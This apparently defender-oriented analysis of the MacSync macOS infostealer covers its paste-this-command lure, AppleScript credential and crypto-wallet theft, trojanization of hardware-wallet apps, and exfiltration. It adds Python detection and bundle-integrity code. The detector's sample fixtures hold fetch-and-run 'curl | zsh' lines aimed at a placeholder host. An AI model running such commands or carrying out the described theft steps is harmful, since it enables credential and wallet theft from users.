MacSync is a stealthy macOS information stealer designed to harvest sensitive credentials, browser data, and most notably, cryptocurrency wallet secrets from infected systems. It leverages a social-engineering delivery technique that bypasses macOS native protections and relies on script-driven execution rather than binary installers. It also features an unusual persistence mechanism involving the trojanization of trusted Electron-based hardware wallet applications such as Ledger and Trezor.
This analysis outlines the complete infection chain, detailed payload mechanics, exfiltration techniques, and persistence strategies, offering defenders insight into detection and mitigation.
Delivery and Infection Chain
ClickFix-Style Social Engineering
MacSync’s delivery begins with a carefully crafted phishing lure:
- Actors create web pages that mimic legitimate macOS software installers, often for cloud storage tools.
- Victims are instructed to copy and paste a single Terminal command to “install” the software — a technique known as a ClickFix-style lure.
- This approach intentionally bypasses macOS protections such as Gatekeeper, notarization checks, and signature enforcement, because the user explicitly executes the command in Terminal.
The lure lands users on domains such as macclouddrive[.]com/s2/, often via chains starting from phishing or compromised sites masquerading as login pages of trusted services.
Stager Script Execution
The One-Liner Command
The Terminal command provided to victims does two key things:
- Prints a fake App Store installation URL to reassure users.
- Uses curl to fetch and pipe a script directly to zsh, executing it without being written to disk.
This results in a lightweight Zsh script that functions as a loader. It:
- Daemonizes itself to run in the background.
- Fetches a remote AppleScript payload from attacker-controlled infrastructure using hardcoded API keys and tokens.
- Executes the AppleScript directly in memory via osascript.
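The curl-to-zsh one-liner described above is the cheapest point in the chain to catch, because the whole lure is visible in a single process command line. The following detection logic is an added example (not code from the article or from any vendor) that scores EDR-style command lines for a downloader piped into an interpreter, command substitution of remote content, and the decoy App Store URL; the sample command lines are constructed, and lure.invalid is a placeholder domain.

```python
import os
import re

# Constructed sample process command lines (not from the article's telemetry).
SAMPLE_CMDLINES = [
    'echo "https://apps.apple.com/app/id0000000000"; curl -fsSL https://lure.invalid/s2/install | zsh',
    'zsh -c "$(curl -s https://lure.invalid/v2/loader)"',
    'curl -O https://example.invalid/tool.dmg',
    'cat /var/log/install.log | grep -i error',
]

DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"zsh", "sh", "bash", "osascript"}
WRAPPERS = {"sudo", "nohup", "env", "exec"}

def _argv0(stage):
    """Program name of one pipeline stage, skipping wrappers and VAR=value prefixes."""
    toks = stage.strip().split()
    while toks and (toks[0] in WRAPPERS or "=" in toks[0]):
        toks.pop(0)
    return os.path.basename(toks[0]) if toks else ""

def clickfix_findings(cmdline):
    """Return the reasons a command line resembles a curl | zsh ClickFix lure (empty if none)."""
    findings = []
    for statement in re.split(r";|&&", cmdline):
        # split on a single '|' only, so '||' is not treated as a pipe
        stages = [_argv0(s) for s in re.split(r"(?<!\|)\|(?!\|)", statement)]
        for left, right in zip(stages, stages[1:]):
            if left in DOWNLOADERS and right in INTERPRETERS:
                findings.append(f"{left} output piped into {right}")
    # remote content executed through command substitution: zsh -c "$(curl ...)"
    if re.search(r"\$\(\s*(curl|wget)\b|`\s*(curl|wget)\b", cmdline):
        findings.append("remote content executed via command substitution")
    # the MacSync one-liner prints a decoy App Store URL next to the real download
    if findings and "apps.apple.com" in cmdline:
        findings.append("decoy App Store URL printed alongside remote script execution")
    return findings

def scan(cmdlines):
    """Map each suspicious command line to its findings; clean lines are omitted."""
    return {c: f for c in cmdlines if (f := clickfix_findings(c))}

if __name__ == "__main__":
    for cmd, why in scan(SAMPLE_CMDLINES).items():
        print(cmd, "->", "; ".join(why))
```

The same checks apply to the shell history file of the victim user and to the parent command line of any osascript process, since the loader daemonizes itself before invoking osascript.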
Core Payload: AppleScript Infostealer
Once executed, the AppleScript component performs the bulk of malicious activity. It is modular, highly targeted, and designed to harvest high-value data:
Password Phishing Loop
The script immediately displays fake system dialogs requesting the macOS login password:
- It repeatedly shows a lock-style prompt until the user enters a valid password.
- This password is essential because it unlocks encrypted stores such as the macOS Keychain and browser credentials.
Data Theft and Targeting
The AppleScript systematically exfiltrates a variety of sensitive information:
Browser Data
It recursively collects entire profile directories from popular Chromium-based browsers including:
- Google Chrome
- Brave
- Microsoft Edge
- Opera
- Vivaldi
- Yandex
For each, it collects key artifacts such as saved passwords, cookies, history, and autofill data — all of which may be decrypted offline using the phished password.
Cryptocurrency Targets
MacSync’s focus is clear: cryptocurrency users. The malware targets:
- Web3 Wallet Extensions: It contains a broad list of extension IDs (such as MetaMask, Binance Wallet, Coinbase Wallet, Trust Wallet, etc.) and traverses browser extension storage to extract secrets.
- Desktop Wallet Applications: It copies folders for wallets like Exodus, Electrum, Atomic Wallet, Wasabi, and others, allowing extraction of wallet data and seed phrases.
- Keychain Database: The script copies the entire ~/Library/Keychains directory, capturing all credentials including certificates, stored passwords, and secure notes.
Trojanization of Hardware Wallet Applications
A distinguishing feature of MacSync is its ability to trojanize Electron-based hardware wallet companion apps:
- The script conditionally overwrites critical components like app.asar and Info.plist inside wallets such as Ledger Live and Trezor Suite.
- Because Electron apps do not enforce strict ASAR integrity checks and code signing is loosely validated at runtime, attackers can insert custom code that persists within the legitimate app.
- This allows the wallet application itself to launch malicious UI prompts, phish recovery phrases or PINs over time, and sustain long-term access without detection.
This persistence model effectively turns trusted software into a phishing tool that looks familiar to the victim.
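Because the overwritten app.asar and Info.plist keep the bundle launching normally, the practical defence is to baseline those files and re-check them. The following is an added example (not code from the article or from Ledger or Trezor) that hashes the watched parts of an Electron bundle, stores a baseline, and reports modified, added or missing files; the demo builds a constructed Ledger Live-style bundle in a temporary directory and tampers with it, so it runs offline.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# Bundle parts the article reports MacSync overwriting (Info.plist, app.asar); all of
# Resources/ is watched so an added or renamed .asar is caught as well.
WATCHED = ("Contents/Info.plist", "Contents/Resources")

def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(app_dir):
    """Hash every watched file under app_dir; keys are paths relative to the bundle."""
    app_dir = Path(app_dir)
    baseline = {}
    for rel in WATCHED:
        target = app_dir / rel
        files = [target] if target.is_file() else [p for p in target.rglob("*") if p.is_file()]
        for p in files:
            baseline[str(p.relative_to(app_dir))] = _sha256(p)
    return baseline

def verify(app_dir, baseline):
    """Compare the bundle on disk against a stored baseline."""
    current = build_baseline(app_dir)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(set(current) - set(baseline)),
        "missing": sorted(set(baseline) - set(current)),
    }

def demo():
    """Constructed bundle: baseline it, overwrite app.asar and drop an extra file, re-verify."""
    with tempfile.TemporaryDirectory() as tmp:
        app = Path(tmp) / "Ledger Live.app"
        (app / "Contents/Resources").mkdir(parents=True)
        (app / "Contents/Info.plist").write_text("<plist><dict/></plist>")
        (app / "Contents/Resources/app.asar").write_bytes(b"ORIGINAL ASAR")
        baseline = build_baseline(app)
        clean = verify(app, baseline)
        (app / "Contents/Resources/app.asar").write_bytes(b"TROJANIZED ASAR")
        (app / "Contents/Resources/extra.asar").write_bytes(b"NEW")
        return clean, verify(app, baseline)

if __name__ == "__main__":
    print(json.dumps(demo()[1], indent=2))
```

Store the baseline somewhere the logged-in user cannot write, since the stealer runs with that user's privileges, and pair the check with codesign --verify --deep --strict on the bundle, which catches the same overwrite through the code signature.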
Command-and-Control Infrastructure
MacSync’s infrastructure is modular and evolving:
- Multiple rotating C2 domains with consistent naming schemes handle different builds.
- There are at least eight such domains, each tied to unique tokens.
- The lure domain itself may have multiple paths (/v1–/v3) and clone sites with similar templates, suggesting active campaign iteration.
Exfiltration and Cleanup
Once data is collected:
- The AppleScript archives the stolen files into osalogging.zip.
- It posts the archive to the C2 server via multipart upload.
- Temporary files are deleted to reduce forensic traces.
Detection, Mitigation, and Indicators
Indicators of Compromise (IOCs)
- Execution of curl | zsh based scripts from suspicious domains.
- Unexpected background processes associated with unknown domains.
- Modified Electron app bundles in wallet directories.
Mitigation Strategies
- Avoid executing unverified commands in Terminal.
- Validate downloaded executables against official sources.
- Use Endpoint Detection and Response (EDR) tools capable of detecting in-memory script execution.
- Monitor for unexpected modifications in wallet app bundle files.
Conclusion
MacSync represents a sophisticated evolution in macOS stealer malware. Its reliance on script-based execution, deep integration with cryptocurrency workflows, and innovative trojanization of trusted wallet apps make it a significant threat — particularly to users handling digital assets. Defenders must understand both the social engineering entry point and the deep technical mechanics to effectively spot and counter this campaign.
